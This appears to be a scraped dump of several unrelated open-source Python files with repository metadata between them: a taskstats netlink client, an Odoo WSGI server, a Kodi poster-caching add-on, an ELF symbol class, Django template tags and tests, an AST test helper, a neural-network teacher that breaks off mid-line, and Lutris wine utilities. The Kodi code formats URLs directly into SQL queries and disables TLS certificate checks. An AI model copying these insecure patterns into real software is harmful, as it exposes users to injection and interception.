('NULL', netlink.IgnoreType),
)
TaskstatsAttrList = netlink.create_attr_list_type(
'TaskstatsAttrList',
('PID', netlink.U32Type),
('TGID', netlink.U32Type),
('REGISTER_CPUMASK', netlink.IgnoreType),
('DEREGISTER_CPUMASK', netlink.IgnoreType),
)
TaskstatsMessage = netlink.create_genl_message_type(
'TaskstatsMessage', 'TASKSTATS',
('GET', TaskstatsAttrList),
('NEW', TaskstatsType),
required_modules=[],
)
class TaskstatsClient(object):
"""A python client to interact with taskstats
"""
def __init__(self, verbose=False):
self.verbose = verbose
self.nlsock = netlink.NetlinkSocket()
def get_pid_stats(self, pid):
replies = self.nlsock.query(TaskstatsMessage(
'GET', flags=netlink.MessageFlags.ACK_REQUEST,
attr_list=TaskstatsAttrList(pid=pid)
))
return replies[0].get_attr_list().get('aggr_pid').get('stats')
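# Added usage sketch (illustrative; not part of the original module).
# Reading taskstats over netlink typically requires root and a kernel
# built with CONFIG_TASKSTATS, so this is guarded and best-effort.
if __name__ == '__main__':
    import os
    client = TaskstatsClient()
    stats = client.get_pid_stats(os.getpid())
    print('%s: cpu_run_real_total=%d' % (stats.comm, stats.cpu_run_real_total))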
|
bsd-3-clause
| 2,638,740,090,719,133,000 | 32.707071 | 78 | 0.64519 | false |
adaptivdesign/odooku-compat
|
odooku/services/wsgi/server.py
|
1
|
1636
|
from gevent.wsgi import WSGIServer as BaseWSGIServer
from werkzeug.debug import DebuggedApplication
from werkzeug.contrib.fixers import ProxyFix
import odoo.http
from odoo.service.wsgi_server import application_unproxied as odoo_application
from odoo.tools import config
import logging
import greenlet
import gevent
_logger = logging.getLogger(__name__)
class WSGIServer(BaseWSGIServer):
def __init__(self, port, interface='0.0.0.0', max_accept=None,
timeout=25, proxy_mode=False, rules=None, newrelic_agent=None,
**kwargs):
self.max_accept = max_accept or config['db_maxconn']
self.timeout = timeout
super(WSGIServer, self).__init__((interface, port), self.load(
proxy_mode=proxy_mode,
rules=rules,
newrelic_agent=newrelic_agent
), log=_logger, **kwargs)
def load(self, proxy_mode=False, rules=None, newrelic_agent=None):
_logger.info("Loading Odoo WSGI application")
application = odoo_application
if config['debug_mode']:
application = DebuggedApplication(application, evalex=True)
_logger.warning("Debugger enabled, do not use in production")
if newrelic_agent:
application = newrelic_agent.WSGIApplicationWrapper(application)
_logger.info("New Relic enabled")
if rules and rules.has_rules():
application = rules(application)
_logger.info("Rewrites enabled")
if proxy_mode:
application = ProxyFix(application)
_logger.info("Proxy mode enabled")
return application
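# Added usage sketch (illustrative; odooku normally constructs this server
# from its own bootstrap code, and the port/interface below are examples):
#
#   server = WSGIServer(8069, interface='127.0.0.1', proxy_mode=True)
#   server.serve_forever()  # inherited from gevent's WSGIServer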
|
apache-2.0
| -1,330,788,283,459,864,000 | 29.867925 | 78 | 0.659535 | false |
rvlad1987/repository.rvlad1987.xbmc-addons
|
matrix/source/plugin.video.filmix.net.dev/core/image_loader.py
|
1
|
8009
|
# -*- coding: utf-8 -*-
# Used in
# http.py - format_poster_link()
# list.py - add_movies()
import traceback
import xbmcvfs
import xbmcup.app, xbmcup.net
from .xbmcup.db import SQL
from .xbmcup.system import FS
from .image_size import get_image_size_from_bytesio
from .auth import Auth
from .defines import *
# https://github.com/xbmc/xbmc/blob/master/xbmc/utils/Crc32.cpp
class KodiCrc32:
crc_tab = [
0x00000000, 0x04C11DB7, 0x09823B6E, 0x0D4326D9,
0x130476DC, 0x17C56B6B, 0x1A864DB2, 0x1E475005,
0x2608EDB8, 0x22C9F00F, 0x2F8AD6D6, 0x2B4BCB61,
0x350C9B64, 0x31CD86D3, 0x3C8EA00A, 0x384FBDBD,
0x4C11DB70, 0x48D0C6C7, 0x4593E01E, 0x4152FDA9,
0x5F15ADAC, 0x5BD4B01B, 0x569796C2, 0x52568B75,
0x6A1936C8, 0x6ED82B7F, 0x639B0DA6, 0x675A1011,
0x791D4014, 0x7DDC5DA3, 0x709F7B7A, 0x745E66CD,
0x9823B6E0, 0x9CE2AB57, 0x91A18D8E, 0x95609039,
0x8B27C03C, 0x8FE6DD8B, 0x82A5FB52, 0x8664E6E5,
0xBE2B5B58, 0xBAEA46EF, 0xB7A96036, 0xB3687D81,
0xAD2F2D84, 0xA9EE3033, 0xA4AD16EA, 0xA06C0B5D,
0xD4326D90, 0xD0F37027, 0xDDB056FE, 0xD9714B49,
0xC7361B4C, 0xC3F706FB, 0xCEB42022, 0xCA753D95,
0xF23A8028, 0xF6FB9D9F, 0xFBB8BB46, 0xFF79A6F1,
0xE13EF6F4, 0xE5FFEB43, 0xE8BCCD9A, 0xEC7DD02D,
0x34867077, 0x30476DC0, 0x3D044B19, 0x39C556AE,
0x278206AB, 0x23431B1C, 0x2E003DC5, 0x2AC12072,
0x128E9DCF, 0x164F8078, 0x1B0CA6A1, 0x1FCDBB16,
0x018AEB13, 0x054BF6A4, 0x0808D07D, 0x0CC9CDCA,
0x7897AB07, 0x7C56B6B0, 0x71159069, 0x75D48DDE,
0x6B93DDDB, 0x6F52C06C, 0x6211E6B5, 0x66D0FB02,
0x5E9F46BF, 0x5A5E5B08, 0x571D7DD1, 0x53DC6066,
0x4D9B3063, 0x495A2DD4, 0x44190B0D, 0x40D816BA,
0xACA5C697, 0xA864DB20, 0xA527FDF9, 0xA1E6E04E,
0xBFA1B04B, 0xBB60ADFC, 0xB6238B25, 0xB2E29692,
0x8AAD2B2F, 0x8E6C3698, 0x832F1041, 0x87EE0DF6,
0x99A95DF3, 0x9D684044, 0x902B669D, 0x94EA7B2A,
0xE0B41DE7, 0xE4750050, 0xE9362689, 0xEDF73B3E,
0xF3B06B3B, 0xF771768C, 0xFA325055, 0xFEF34DE2,
0xC6BCF05F, 0xC27DEDE8, 0xCF3ECB31, 0xCBFFD686,
0xD5B88683, 0xD1799B34, 0xDC3ABDED, 0xD8FBA05A,
0x690CE0EE, 0x6DCDFD59, 0x608EDB80, 0x644FC637,
0x7A089632, 0x7EC98B85, 0x738AAD5C, 0x774BB0EB,
0x4F040D56, 0x4BC510E1, 0x46863638, 0x42472B8F,
0x5C007B8A, 0x58C1663D, 0x558240E4, 0x51435D53,
0x251D3B9E, 0x21DC2629, 0x2C9F00F0, 0x285E1D47,
0x36194D42, 0x32D850F5, 0x3F9B762C, 0x3B5A6B9B,
0x0315D626, 0x07D4CB91, 0x0A97ED48, 0x0E56F0FF,
0x1011A0FA, 0x14D0BD4D, 0x19939B94, 0x1D528623,
0xF12F560E, 0xF5EE4BB9, 0xF8AD6D60, 0xFC6C70D7,
0xE22B20D2, 0xE6EA3D65, 0xEBA91BBC, 0xEF68060B,
0xD727BBB6, 0xD3E6A601, 0xDEA580D8, 0xDA649D6F,
0xC423CD6A, 0xC0E2D0DD, 0xCDA1F604, 0xC960EBB3,
0xBD3E8D7E, 0xB9FF90C9, 0xB4BCB610, 0xB07DABA7,
0xAE3AFBA2, 0xAAFBE615, 0xA7B8C0CC, 0xA379DD7B,
0x9B3660C6, 0x9FF77D71, 0x92B45BA8, 0x9675461F,
0x8832161A, 0x8CF30BAD, 0x81B02D74, 0x857130C3,
0x5D8A9099, 0x594B8D2E, 0x5408ABF7, 0x50C9B640,
0x4E8EE645, 0x4A4FFBF2, 0x470CDD2B, 0x43CDC09C,
0x7B827D21, 0x7F436096, 0x7200464F, 0x76C15BF8,
0x68860BFD, 0x6C47164A, 0x61043093, 0x65C52D24,
0x119B4BE9, 0x155A565E, 0x18197087, 0x1CD86D30,
0x029F3D35, 0x065E2082, 0x0B1D065B, 0x0FDC1BEC,
0x3793A651, 0x3352BBE6, 0x3E119D3F, 0x3AD08088,
0x2497D08D, 0x2056CD3A, 0x2D15EBE3, 0x29D4F654,
0xC5A92679, 0xC1683BCE, 0xCC2B1D17, 0xC8EA00A0,
0xD6AD50A5, 0xD26C4D12, 0xDF2F6BCB, 0xDBEE767C,
0xE3A1CBC1, 0xE760D676, 0xEA23F0AF, 0xEEE2ED18,
0xF0A5BD1D, 0xF464A0AA, 0xF9278673, 0xFDE69BC4,
0x89B8FD09, 0x8D79E0BE, 0x803AC667, 0x84FBDBD0,
0x9ABC8BD5, 0x9E7D9662, 0x933EB0BB, 0x97FFAD0C,
0xAFB010B1, 0xAB710D06, 0xA6322BDF, 0xA2F33668,
0xBCB4666D, 0xB8757BDA, 0xB5365D03, 0xB1F740B4
]
m_crc = None
in_hex = None
def Reset(self):
self.m_crc = 0xFFFFFFFF
def Compute(self, buffer):
self.Reset()
for char in buffer:
self.m_crc = ((self.m_crc << 8) & 0xFFFFFFFF) ^ self.crc_tab[(((self.m_crc >> 24) & 0xFFFFFFFF) ^ ord(char)) & 0xFF]
def ComputeFromLowerCase(self, strValue):
strLower = strValue.lower()
self.Compute(strLower)
self.in_hex = '0x{:08x}'.format( self.m_crc )
return self.m_crc
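# Added illustration (not part of the original add-on): Kodi names cached
# textures after the lowercase CRC of the source URL, which is what
# ImageDetails.get_cache_file_name() below relies on.
#
#   crc = KodiCrc32()
#   crc.ComputeFromLowerCase('http://example.com/poster.jpg')
#   crc.in_hex  # e.g. '0x1a2b3c4d' (actual value depends on the URL)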
class TexturesSQL(SQL):
def __init__(self, filename):
self._filename = filename
self.db = None
def url_exists(self, url):
sql = "SELECT id FROM texture WHERE url='{}'".format(url)
rows = self.get(sql)
return rows != []
# https://github.com/xbmc/xbmc/blob/master/xbmc/TextureDatabase.cpp
def AddCachedTexture(self, details):
sql = "DELETE FROM texture WHERE url='{}'".format(details.url)
self.set(sql)
date = '' # do not update texture in future
sql = "INSERT INTO texture (url, cachedurl, imagehash, lasthashcheck) VALUES('{}', '{}', '{}', '{}')".format(details.url, details.file, details.hash, date)
lastrowid, rowcount = self.set(sql)
sql = "INSERT INTO sizes (idtexture, size, usecount, lastusetime, width, height) VALUES({}, 1, 1, CURRENT_TIMESTAMP, {}, {})".format(lastrowid, details.width, details.height)
self.set(sql)
class ImageDetails:
url = ''
file = '' # cachedurl
hash = '' # imagehash
width = 0
height = 0
file_path = ''
size = 0
def __init__(self, url):
self.url = url
self.crc = KodiCrc32()
self.fs = FS()
self.get_cache_file_name()
# https://github.com/xbmc/xbmc/blob/master/xbmc/TextureCacheJob.cpp
def get_image_hash(self):
self.hash = "BADHASH"
st = xbmcvfs.Stat(self.file_path)
time = st.st_mtime()
self.size = st.st_size()
        if time is None:
time = st.st_ctime()
if time or self.size:
self.hash = 'd' + str(time) + 's' + str(self.size)
return self.hash
return self.hash
def get_cache_file_name(self):
self.crc.ComputeFromLowerCase(self.url)
fname = self.crc.in_hex[2:] + self.url[-4:]
self.file = fname[0] + '/' + fname
self.file_path = self.fs._path( 'thumbnails://' + self.file )
return self.file_path
def get_image_size(self):
try:
fn = self.file_path.decode('utf8') if IS_WIN_PLATFORM else self.file_path
input = open(fn, 'rb')
self.width, self.height = get_image_size_from_bytesio(input, self.size)
input.close()
        except Exception:
            print(traceback.format_exc())
return None
def get_image_info(self):
self.get_image_hash()
self.get_image_size()
class ImageLoader:
def __init__(self):
        self.fs = FS()
        self.mycookie = None  # cookie cache used by load_to_cache()
self.db = TexturesSQL( self.fs._path( 'database://Textures13.db' ) )
def load_to_cache(self, url):
if self.db.url_exists(url):
return True
self.details = ImageDetails(url)
if not self.fs.exists(self.details.file_path):
try:
self.auth = Auth()
self.cookie = self.auth.get_cookies()
                cook = self.mycookie if self.cookie is None else self.cookie
                response = xbmcup.net.http.get(url, cookies=cook, verify=False, proxies=PROXIES)
                if self.cookie is None:
                    self.mycookie = response.cookies
except xbmcup.net.http.exceptions.RequestException:
                print(traceback.format_exc())
else:
if(response.status_code == 200):
file = self.fs.file(self.details.file_path, "w")
file.write(response.content)
file.close()
self.details.get_image_info()
self.db.AddCachedTexture(self.details)
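# Added usage sketch (illustrative; assumes a running Kodi environment where
# 'database://Textures13.db' and 'thumbnails://' resolve to real paths):
#
#   loader = ImageLoader()
#   loader.load_to_cache('http://example.com/poster.jpg')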
|
gpl-2.0
| -6,628,772,293,520,631,000 | 36.083333 | 182 | 0.637408 | false |
Ruide/angr-dev
|
cle/cle/backends/elf/symbol.py
|
1
|
2191
|
from ..symbol import Symbol
from ...address_translator import AT
class ELFSymbol(Symbol):
"""
Represents a symbol for the ELF format.
:ivar str elftype: The type of this symbol as an ELF enum string
:ivar str binding: The binding of this symbol as an ELF enum string
:ivar section: The section associated with this symbol, or None
"""
def __init__(self, owner, symb):
realtype = owner.arch.translate_symbol_type(symb.entry.st_info.type)
if realtype == 'STT_FUNC':
symtype = Symbol.TYPE_FUNCTION
elif realtype == 'STT_OBJECT':
symtype = Symbol.TYPE_OBJECT
elif realtype == 'STT_SECTION':
symtype = Symbol.TYPE_SECTION
elif realtype == 'STT_NOTYPE':
symtype = Symbol.TYPE_NONE
else:
symtype = Symbol.TYPE_OTHER
sec_ndx, value = symb.entry.st_shndx, symb.entry.st_value
# A relocatable object's symbol's value is relative to its section's addr.
if owner.is_relocatable and isinstance(sec_ndx, (int, long)):
value += owner.sections[sec_ndx].remap_offset
super(ELFSymbol, self).__init__(owner,
symb.name,
AT.from_lva(value, owner).to_rva(),
symb.entry.st_size,
symtype)
self.elftype = realtype
self.binding = symb.entry.st_info.bind
self.section = sec_ndx if type(sec_ndx) is not str else None
self.is_static = self.type == Symbol.TYPE_SECTION or sec_ndx == 'SHN_ABS'
self.is_common = sec_ndx == 'SHN_COMMON'
self.is_weak = self.binding == 'STB_WEAK'
# these do not appear to be 100% correct, but they work so far...
# e.g. the "stdout" import symbol will be marked as an export symbol by this
# there does not seem to be a good way to reliably isolate import symbols
self.is_import = self.section is None and self.binding in ('STB_GLOBAL', 'STB_WEAK')
self.is_export = self.section is not None and self.binding in ('STB_GLOBAL', 'STB_WEAK')
|
bsd-2-clause
| -9,152,794,862,424,601,000 | 44.645833 | 96 | 0.584665 | false |
featherweightweb/django-composer
|
composer/templatetags/composer.py
|
1
|
5201
|
"""
composer.py
"""
from django import template
from django.conf import settings
from django.core.urlresolvers import reverse
from ..models import Element
register = template.Library()
class LazyContent:
"""
Wrapper around a `NodeList` that is lazily-evaluated to a string.
"""
def __init__(self, nodelist, context):
self.nodelist = nodelist
self.context = context
def __str__(self):
return self.nodelist.render(self.context)
def serialize_context(context):
"""
Serializes a dictionary, list, or object into an easy to read example of the
context.
"""
if type(context) == dict:
return '\n'.join(['%s = %r' % (key, val) for key, val in context.items()])
if type(context) == list:
result = 'list of %d elements' % len(context)
for i, e in enumerate(context[0:15]):
result += '\n%2d = %r' % (i, e)
if len(context) > 15:
result += '\n ...\n%2d = %r' % (len(context), context[-1])
return result
    if context is not None and context != {}:
        return 'object: ' + repr(context)
    return ''
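# Added examples (illustrative) of the serialized forms produced above:
#
#   serialize_context({'title': 'Home'})  -> "title = 'Home'"
#   serialize_context(['a', 'b'])         -> "list of 2 elements\n 0 = 'a'\n 1 = 'b'"
#   serialize_context(42)                 -> "object: 42"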
class ComposerNode(template.Node):
def __init__(self, name, content=None, nodelist=None, context_var=None, dynamic=False):
self.name = name
self.content = content
self.nodelist = nodelist
self.dynamic = dynamic
if context_var is not None:
self.context_var = template.Variable(context_var)
else:
self.context_var = None
def render(self, context):
"""
The `template_name` context variable must be present.
"""
if self.nodelist:
self.content = LazyContent(self.nodelist, context)
template = context.get('template_name', None)
elements = context.get('composer_elements', None)
if template is None or elements is None:
return str(self.content)
has_perm = context.get('can_compose_permission', False)
el_context = {}
if self.context_var is not None:
el_context = self.context_var.resolve(context)
if self.name not in elements:
context['composer_elements'][self.name] = Element.objects.create(
template_name=template,
name=self.name,
is_dynamic=self.dynamic,
context_example=serialize_context(el_context),
content=str(self.content))
element = elements[self.name]
try:
result = element.render(self.content, el_context)
except Exception as e:
if has_perm:
result = str(e)
else:
result = element.content
if has_perm:
url = reverse('composer-edit-element', kwargs={'pk': element.id})
result = '<div class="edit-composer-button">edit</div>' + result
result = '<div class="edit-composer-element" data-url="%s" data-name="%s">%s</div>' % (
url, self.name, result)
return result
def strip_quotes(val):
quotes = ("'", '"')
if type(val) == str and val[0] in quotes and val[-1] in quotes:
return val[1:-1]
return val
@register.tag(name='composer_dynamic')
def do_composer_dynamic(parser, token):
"""
This tag expects the following format:
{% composer_dynamic 'name' context_var %}
This is the default template, which can use {% if blah %}context {{vars}}{% endif %}
{% endcomposer %}
The second argument is optional.
"""
bits = token.split_contents()
name, context_var = None, None
try:
if len(bits) == 2:
_, name = bits
else:
_, name, context_var = bits
except ValueError:
raise template.TemplateSyntaxError(
'%r tag requires either 1 or 2 arguments' % token.contents.split()[0])
name = strip_quotes(name)
nodelist = parser.parse(('endcomposer',))
parser.delete_first_token()
return ComposerNode(name, nodelist=nodelist, context_var=context_var, dynamic=True)
@register.tag(name='composer_static')
def do_composer_static(parser, token):
"""
This tag expects the following format:
{% composer_static 'name' %}Some static default content.{% endcomposer %}
"""
try:
_, name = token.split_contents()
except ValueError:
raise template.TemplateSyntaxError(
'%r tag requires exactly 1 argument' % token.contents.split()[0])
name = strip_quotes(name)
nodelist = parser.parse(('endcomposer',))
parser.delete_first_token()
return ComposerNode(name, nodelist=nodelist)
@register.simple_tag(takes_context=True)
def composer_includes(context):
"""
Include the composer JS and CSS files in a page if the user has permission.
"""
if context.get('can_compose_permission', False):
url = settings.STATIC_URL
url += '' if url[-1] == '/' else '/'
js = '<script type="text/javascript" src="%sjs/composer.min.js"></script>' % url
css = '<link rel="stylesheet" type="text/css" href="%scss/composer.css">' % url
return js + css
return ''
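# Added template usage example (illustrative; the tag names match the
# registrations above, the surrounding template is hypothetical):
#
#   {% load composer %}
#   {% composer_static 'sidebar-intro' %}Default sidebar text.{% endcomposer %}
#   {% composer_dynamic 'news-list' articles %}
#       {% for item in articles %}{{ item.title }}{% endfor %}
#   {% endcomposer %}
#   {% composer_includes %}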
|
mit
| -3,234,653,981,534,419,500 | 29.775148 | 99 | 0.592386 | false |
openaid-IATI/OIPA
|
OIPA/api/country/tests/test_country_serializers.py
|
1
|
3343
|
from unittest import skip
from django.contrib.gis.geos import Point
from django.test import RequestFactory, TestCase
from api.country import serializers
from geodata.factory import geodata_factory
class TestCountrySerializers(TestCase):
request_dummy = RequestFactory().get('/')
@skip
def test_CountrySerializer(self):
country = geodata_factory.CountryFactory.build(
code='NL',
name='Netherlands',
alt_name='Nederland',
language='en',
dac_country_code=1,
iso3='NLD',
alpha3='NLD',
fips10='FIPS',
center_longlat=Point(5.45, 52.3),
)
serializer = serializers.CountrySerializer(
country,
context={'request': self.request_dummy}
)
assert serializer.data['code'] == country.code,\
"""
'country.code' should be serialized to a field called 'code'
"""
assert serializer.data['name'] == country.name,\
"""
'country.name' should be serialized to a field called 'name'
"""
assert serializer.data[
'numerical_code_un'
] == country.numerical_code_un,\
"""
'country.numerical_code_un' should be serialized to a field called
'numerical_code_un'
"""
assert serializer.data['name'] == country.name,\
"""
'country.name' should be serialized to a field called 'name'
"""
assert serializer.data['alt_name'] == country.alt_name,\
"""
'country.alt_name' should be serialized to a field called
'alt_name'
"""
assert serializer.data['language'] == country.language,\
"""
'country.language' should be serialized to a field called
'language'
"""
assert serializer.data[
'dac_country_code'
] == country.dac_country_code,\
"""
'country.dac_country_code' should be serialized to a field called
'dac_country_code'
"""
assert serializer.data['iso3'] == country.iso3,\
"""
'country.iso3' should be serialized to a field called 'iso3'
"""
assert serializer.data['alpha3'] == country.alpha3,\
"""
'country.alpha3' should be serialized to a field called 'alpha3'
"""
assert serializer.data['fips10'] == country.fips10,\
"""
'country.fips10' should be serialized to a field called 'fips10'
"""
required_fields = (
'url',
'code',
'pk',
'numerical_code_un',
'name',
'alt_name',
'language',
'region',
'un_region',
'unesco_region',
'dac_country_code',
'iso3',
'alpha3',
'fips10',
'data_source',
'activities',
'location',
'polygon',
)
assertion_msg = "the field '{0}' should be in the serialized country"
for field in required_fields:
assert field in serializer.data, assertion_msg.format(field)
|
agpl-3.0
| -422,782,868,062,683,260 | 31.77451 | 78 | 0.512115 | false |
russross/codegrinder
|
files/python3unittest/tests/asttest.py
|
1
|
9348
|
import ast
import os
import sys
import trace
import unittest
class ASTTest(unittest.TestCase):
def setUp(self, filename, parse_file=True):
"""Stores the raw text of the student submission, the lines that were
printed when executing the student submission, and the AST tree of the
submission."""
self.filename = filename
self.printed_lines = []
f = open(filename)
text = f.read()
self.file = text
if parse_file:
self.tree = ast.parse(text)
f.close()
def find_all(self, node_type, start_node=None):
"""Returns all of the AST nodes matching the given node type. Optional
start_node parameter allows walking a specific portion of the original
tree. TODO: list common node types here for easy access."""
if start_node is None:
start_node = self.tree
nodes = []
for node in ast.walk(start_node):
if isinstance(node, node_type):
nodes.append(node)
return nodes
def print_replacement(self, *text, **kwargs):
"""Saves printed lines to a data member. Used by exec_solution, not
usually necessary in any specific test."""
self.printed_lines += text
def exec_solution(self):
"""Executes the student submission."""
print = self.print_replacement
exec(self.file)
def debug_tree(self):
"""Converts the AST tree for manual traversal. Not really necessary
with find_all."""
return ast.dump(self.tree)
def get_function_calls(self, start_node=None):
"""Helper to find all of the function calls in the submission."""
names = []
for func in self.find_all(ast.Call, start_node):
if isinstance(func.func, ast.Name):
names.append(func.func.id)
return names
def find_function_calls(self, func_name):
"""Finds all of the function calls that match a certain name and
returns their nodes."""
calls = []
for call in self.find_all(ast.Call):
if isinstance(call.func, ast.Name) and call.func.id == func_name:
calls.append(call)
return calls
def get_method_calls(self, start_node=None):
"""Helper to find all of the function calls in the submission."""
names = []
for func in self.find_all(ast.Call, start_node):
if isinstance(func.func, ast.Attribute):
names.append(func.func.attr)
return names
def find_method_calls(self, func_name):
"""Finds all of the method calls that match a certain name and returns
their nodes."""
calls = []
for call in self.find_all(ast.Call):
if isinstance(call.func, ast.Attribute) and call.func.attr == func_name:
calls.append(call)
return calls
def match_signature(self, funcname, argc):
"""Finds and returns the function definition statement that matches the
given function name and argument count. If it can't find a
corresponding function definition, it returns None."""
for func in self.find_all(ast.FunctionDef):
if func.name == funcname and len(func.args.args) == argc:
return func
return None
def assert_prints(self, lines=1, msg="You are not printing anything!"):
"""Assert helper testing the number of printed lines."""
self.assertGreaterEqual(len(self.printed_lines), 1, msg)
def function_prints(self, func_def_node):
"""Checks whether the given function has been defined to print or not."""
calls_in_func = self.find_all(ast.Call, func_def_node)
for call in calls_in_func:
            if isinstance(call.func, ast.Name) and call.func.id == "print":
return True
return False
def get_function_linenos(self):
linenos = {}
for funcdef in self.find_all(ast.FunctionDef):
linenos[funcdef.name] = {
"start": funcdef.lineno,
"end": get_function_end_lineno(funcdef),
}
return linenos
def ensure_coverage(self, function_names, min_coverage):
"""Checks whether the student has written enough unit tests to cover a
significant portion of their solution. Note: super hacky... Also, you
might want to patch stdout for tests that use this."""
basename = self.filename.split('.')[0]
# build a tracer to trace the execution of the student's solution
tracer = trace.Trace(
ignoremods=['asttest'],
ignoredirs=[sys.prefix, sys.exec_prefix])
def trigger(basename):
"""Helper function to import student's solution and thus, evaluate it"""
import importlib
# import solution
m = importlib.import_module(basename)
# reload it to force evaluating it (in case already imported elsewhere)
importlib.reload(m)
# run the helper function (trigger) to trigger evaluation of the solution
tracer.runfunc(trigger, basename)
# write tracing results to a *.cover file
tracer.results().write_results(coverdir='.')
# count how many lines were skipped
all_skipped = []
f = open(basename+".cover")
lineno = 0
for line in f:
lineno += 1
if line[:6] == ">>>>>>":
# skipped line
all_skipped.append((line[8:], lineno))
f.close()
# clean up cover file
os.remove(basename+".cover")
# count executable lines
visitor = FindExecutableLines()
visitor.visit(self.tree)
all_executable_lines = set(visitor.lines)
# compare skipped lines with actual lines
total_lines = 0
skipped_lines = []
executable_lines = []
linenos = self.get_function_linenos()
for funcname in function_names:
self.assertIn(funcname, linenos, "Function {} is not "
"defined.".format(funcname))
start = linenos[funcname]["start"]
end = linenos[funcname]["end"]
# count executable lines (can't just subtract start from end
# because that includes lines that don't show up in the trace)
for lineno in all_executable_lines:
if lineno in range(start+1, end+1):
total_lines += 1
# count skipped lines
for (line, lineno) in all_skipped:
if lineno in range(start+1, end+1):
skipped_lines.append(line)
self.assertGreater((total_lines-len(skipped_lines))/total_lines, min_coverage,
"Your test coverage is not adequate. Write tests that cover "
"all possible outcomes of your function. Here are the lines "
"that weren't covered:\n\n" + '\n'.join(skipped_lines))
def is_top_level(self, node):
"""Determines if a node is at the top-level of the program."""
for elt in self.tree.body:
if isinstance(elt, ast.Expr):
if elt.value == node:
return True
elif elt == node:
return True
return False
def get_function_end_lineno(funcdef):
"""Given an ast.FunctionDef node, returns the line number of the last line
in the function. I only wrote this since I found out too late the
end_lineno attribute was only introduced in Python 3.8, which we aren't
currently using."""
if sys.version_info[0] >= 3 and sys.version_info[1] >= 8:
return funcdef.end_lineno
last = funcdef.body[-1]
while isinstance(last, (ast.For, ast.While, ast.If)):
last = last.body[-1]
return last.lineno
class FindExecutableLines(ast.NodeVisitor):
"""
taken from pedal
- (https://github.com/pedal-edu/pedal/blob/f3c195a2da9416745ad9122ec0e69d3d75d59866/pedal/sandbox/commands.py#L297)
- (https://github.com/pedal-edu/pedal/blob/f3c195a2da9416745ad9122ec0e69d3d75d59866/pedal/utilities/ast_tools.py#L147)
NodeVisitor subclass that visits every statement of a program and tracks
their line numbers in a list.
Attributes:
lines (list[int]): The list of lines that were visited.
"""
def __init__(self):
self.lines = []
def _track_lines(self, node):
self.lines.append(node.lineno)
self.generic_visit(node)
visit_FunctionDef = _track_lines
visit_AsyncFunctionDef = _track_lines
visit_ClassDef = _track_lines
visit_Return = _track_lines
visit_Delete = _track_lines
visit_Assign = _track_lines
visit_AugAssign = _track_lines
visit_AnnAssign = _track_lines
visit_For = _track_lines
visit_AsyncFor = _track_lines
visit_While = _track_lines
visit_If = _track_lines
visit_With = _track_lines
visit_AsyncWith = _track_lines
visit_Raise = _track_lines
visit_Try = _track_lines
visit_Assert = _track_lines
visit_Import = _track_lines
visit_ImportFrom = _track_lines
visit_Global = _track_lines
visit_Nonlocal = _track_lines
visit_Expr = _track_lines
visit_Pass = _track_lines
visit_Continue = _track_lines
visit_Break = _track_lines
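# Added usage sketch (illustrative; 'solution.py' is a hypothetical student
# submission, not part of this module):
#
#   class TestSolution(ASTTest):
#       def setUp(self):
#           super().setUp('solution.py')
#       def test_main_defined(self):
#           self.assertIsNotNone(self.match_signature('main', 0))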
|
agpl-3.0
| -8,695,240,081,531,041,000 | 38.443038 | 126 | 0.607082 | false |
navjeet0211/Mara
|
ANN/Learn.py
|
1
|
2320
|
#!/usr/bin/python
# -*- coding: ISO-8859-1 -*-
"""
Mara.ANN.Learn (v. 0.1):
Learning algorithms for neural networks.
Author: Martti Louhivuori (martti.louhivuori@helsinki.fi)
Date: 14.2.2006
"""
class Teacher:
def __init__(self, net, method='bp', targets=None, rate=1,
gradient_delta=0.1):
self.net = net
self.method = method
self.targets = targets
self.rate = rate
self.__valid_methods__ = ['bp']
self.__gradient_delta__ = gradient_delta
def get_valid_methods(self):
return self.__valid_methods__
def set_gradient_delta(self, delta):
self.__gradient_delta__ = delta
def get_gradient_delta(self):
return self.__gradient_delta__
def teach(self, net=None, targets=None):
if net is None:
net = self.net
if targets is None:
targets = self.targets
errors = []
for neuron,target in zip(net.layers['output'], targets):
errors.append(float(target-neuron.status()))
total_error = 0
for e in errors:
total_error += e**2
total_error /= 2
done = []
current = []
for neuron,error in zip(net.layers['output'],errors):
signal = neuron.input_signal()
neuron.gradient = error*neuron.evolve(signal+self.__gradient_delta__)/self.__gradient_delta__
done.append(neuron)
for k in neuron.inputs.keys():
if k not in current:
current.append(k)
while len(current) > 0:
next = []
for n in current:
if n not in done:
signal = n.input_signal()
delta = n.evolve(signal+self.__gradient_delta__)/self.__gradient_delta__
sum = 0
for o in n.outputs:
sum += o.gradient*o.inputs[n]['weight']
o.inputs[n]['weight'] += self.rate*o.gradient*n.status()
n.gradient = delta*sum
for k in n.inputs.keys():
if k not in next:
next.append(k)
done.append(n)
current = next
tree = []
for
|
gpl-2.0
| 3,202,342,299,023,073,000 | 30.351351 | 105 | 0.496552 | false |
lutris/lutris
|
lutris/util/wine/wine.py
|
1
|
15483
|
"""Utilities for manipulating Wine"""
import os
from collections import OrderedDict
from functools import lru_cache
from gettext import gettext as _
from lutris import runtime, settings
from lutris.gui.dialogs import DontShowAgainDialog, ErrorDialog
from lutris.runners.steam import steam
from lutris.util import linux, system
from lutris.util.log import logger
from lutris.util.strings import parse_version, version_sort
from lutris.util.wine import fsync
WINE_DIR = os.path.join(settings.RUNNER_DIR, "wine")
WINE_DEFAULT_ARCH = "win64" if linux.LINUX_SYSTEM.is_64_bit else "win32"
WINE_PATHS = {
"winehq-devel": "/opt/wine-devel/bin/wine",
"winehq-staging": "/opt/wine-staging/bin/wine",
"wine-development": "/usr/lib/wine-development/wine",
"system": "wine",
}
ESYNC_LIMIT_CHECK = os.environ.get("ESYNC_LIMIT_CHECK", "").lower()
FSYNC_SUPPORT_CHECK = os.environ.get("FSYNC_SUPPORT_CHECK", "").lower()
def get_playonlinux():
"""Return the folder containing PoL config files"""
pol_path = os.path.expanduser("~/.PlayOnLinux")
if system.path_exists(os.path.join(pol_path, "wine")):
return pol_path
return None
def _iter_proton_locations():
"""Iterate through all existing Proton locations"""
for path in [os.path.join(p, "common") for p in steam().get_steamapps_dirs()]:
if os.path.isdir(path):
yield path
for path in [os.path.join(p, "") for p in steam().get_steamapps_dirs()]:
if os.path.isdir(path):
yield path
def get_proton_paths():
"""Get the Folder that contains all the Proton versions. Can probably be improved"""
paths = set()
for path in _iter_proton_locations():
proton_versions = [p for p in os.listdir(path) if "Proton" in p]
for version in proton_versions:
if system.path_exists(os.path.join(path, version, "dist/bin/wine")):
paths.add(path)
return list(paths)
POL_PATH = get_playonlinux()
def detect_arch(prefix_path=None, wine_path=None):
"""Given a Wine prefix path, return its architecture"""
